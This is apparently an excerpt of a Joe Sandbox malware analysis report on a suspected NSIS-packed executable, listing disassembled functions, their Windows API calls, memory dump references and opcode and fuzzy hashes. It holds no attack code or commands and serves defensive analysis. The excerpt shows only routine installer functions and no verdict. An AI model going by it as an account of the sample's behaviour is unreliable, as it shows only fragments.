                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                      • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                      • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401E76
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401EF8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      • Opcode ID: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                      • Instruction ID: e238c2cdee3483520897b3d1e8694375d24364cfb31141c1d88cf39a281bb876
                                                      • Opcode Fuzzy Hash: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                      • Instruction Fuzzy Hash: 9D018871904250EFE7005BB4EE99BDD3FB4AF55301F20897AF142B61E2C6B904459BED
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                      • wsprintfW.USER32 ref: 0040300A
                                                      • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                      • Instruction ID: bec97a1ff423586d6a5c987b60c5c02bd53578e49ae90ce5674df69195bed5dc
                                                      • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                      • Instruction Fuzzy Hash: 98F0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AF646B51D0DBB99A558F99
                                                      APIs
                                                        • Part of subcall function 6E9F12BB: GlobalAlloc.KERNEL32(00000040,?,6E9F12DB,?,6E9F137F,00000019,6E9F11CA,-000000A0), ref: 6E9F12C5
                                                      • GlobalFree.KERNEL32(?), ref: 6E9F2743
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F2778
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: efd6dfa01909102ca7b52d20d28526da43703b353607f361a3cbadd56cf6446e
                                                      • Instruction ID: dfda13daa04b9e3dca0243f9677af83775a1cdfc37fdd677d35d2aca9d49ae9c
                                                      • Opcode Fuzzy Hash: efd6dfa01909102ca7b52d20d28526da43703b353607f361a3cbadd56cf6446e
                                                      • Instruction Fuzzy Hash: 84319EB1908581EFCB158FD9D994E6A7BBAEF873483184929F10297260C731E8578FA1
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                      • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                      • Instruction ID: 349357d0e6511a5e46fd8e19636faeb724d9b15f10a4c99f70335ec2520be7da
                                                      • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                      • Instruction Fuzzy Hash: 2731B171D00124BBCF21AFA5DD89D9E7E79AF44364F14023AF415762E1CB794D418F68
                                                      APIs
                                                      • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                      • wsprintfW.USER32 ref: 00404F78
                                                      • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$H/B
                                                      • API String ID: 3540041739-2222257793
                                                      • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                      • Instruction ID: d50fdcff321319429c488fc01686433ffa638a32cb0890ada2b0e386a1fa8516
                                                      • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                      • Instruction Fuzzy Hash: 8B11A873A0412837DB00656D9D45E9E369C9B85374F154637FA26F31D1E979CC2182E8
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FreeGlobal
                                                      • String ID:
                                                      • API String ID: 2979337801-0
                                                      • Opcode ID: ddbf9ccc876a85be37e6a881864fcb66d0f1bf6b856468c6c249c749bf3eee32
                                                      • Instruction ID: e5b08b7ed952281baf50e45a934e604e8f429bf05e1dbbc4f6b69d4477cb4863
                                                      • Opcode Fuzzy Hash: ddbf9ccc876a85be37e6a881864fcb66d0f1bf6b856468c6c249c749bf3eee32
                                                      • Instruction Fuzzy Hash: B951D1F2D14109EA8B449FEB844059DB6BDAF83316F10855AD400A321EE771E98F8FD1
                                                      APIs
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F25C2
                                                        • Part of subcall function 6E9F12CC: lstrcpynW.KERNEL32(00000000,?,6E9F137F,00000019,6E9F11CA,-000000A0), ref: 6E9F12DC
                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6E9F2548
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E9F2563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                      • String ID:
                                                      • API String ID: 4216380887-0
                                                      • Opcode ID: 83063ce26303c2d6c26ba226cb0acc0cfbbd8c86eaa977178a079106aeb7fac0
                                                      • Instruction ID: 069a715fd106c8c811d4ee2845b458dedca08d356981e1f95a2e17d5b23d2a40
                                                      • Opcode Fuzzy Hash: 83063ce26303c2d6c26ba226cb0acc0cfbbd8c86eaa977178a079106aeb7fac0
                                                      • Instruction Fuzzy Hash: 7641DFB0048785DFDB14DFAAA850B6A77A8FF96315F00881DE40687241EB70E846CFA1
                                                      APIs
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseEnum$DeleteValue
                                                      • String ID:
                                                      • API String ID: 1354259210-0
                                                      • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                      • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                      • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                      • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                      • GetClientRect.USER32(?,?), ref: 00401E0A
                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                      • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                      • Instruction ID: 9dfadece7afb1d036d9df0696a088785edc369755c046bee68b18a74b307b48a
                                                      • Opcode Fuzzy Hash: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                      • Instruction Fuzzy Hash: DC213B72900119AFCF05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E9F22D8,?,00000808), ref: 6E9F16D5
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E9F22D8,?,00000808), ref: 6E9F16DC
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E9F22D8,?,00000808), ref: 6E9F16F0
                                                      • GetProcAddress.KERNEL32(6E9F22D8,00000000), ref: 6E9F16F7
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F1700
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                      • String ID:
                                                      • API String ID: 1148316912-0
                                                      • Opcode ID: eeb951961a02a2fb7bd9b249b1162dc7f40bf8aba84f5bd32f4998f5d7f17dfe
                                                      • Instruction ID: 45a023249f05f443b5b0b30cff80ddd0e1ab1d6937c31636710b0aaed52a6238
                                                      • Opcode Fuzzy Hash: eeb951961a02a2fb7bd9b249b1162dc7f40bf8aba84f5bd32f4998f5d7f17dfe
                                                      • Instruction Fuzzy Hash: 9AF0377210A5387FDB2016AB9D4CC9B7E9CDF8B2F5B150315F719D119085614C02DBF1
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                      • Instruction ID: 990765c93fade27e2bb35c4ad61bbd9c2d50a24465aba9d794b4eebee5297a47
                                                      • Opcode Fuzzy Hash: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                      • Instruction Fuzzy Hash: 30217E7191421AAEEB05AFA4D94AAFE7BB0EF44304F10453EF505B61D0D7B88941DB98
                                                      APIs
                                                        • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                        • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 0040602A
                                                        • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                        • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 004060D2
                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0), ref: 004060E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: 4Wu.Wu$C:\Users\user\AppData\Local\Temp\nsaC158.tmp
                                                      • API String ID: 3248276644-1444128086
                                                      • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                      • Instruction ID: 57cdea5284265d05e194d97f438d60f20e9a33b3e1b8f85ab2b18f32e1c9dba5
                                                      • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                      • Instruction Fuzzy Hash: F6F04425184A6259E622B73A0C05AAF25098F82324B4B463FF803B22C1DF3D8963917E
                                                      APIs
                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 0040602A
                                                      • CharNextW.USER32(00000000), ref: 0040602F
                                                      • CharNextW.USER32(00000000), ref: 00406047
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\nsaC158.tmp, xrefs: 0040601D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
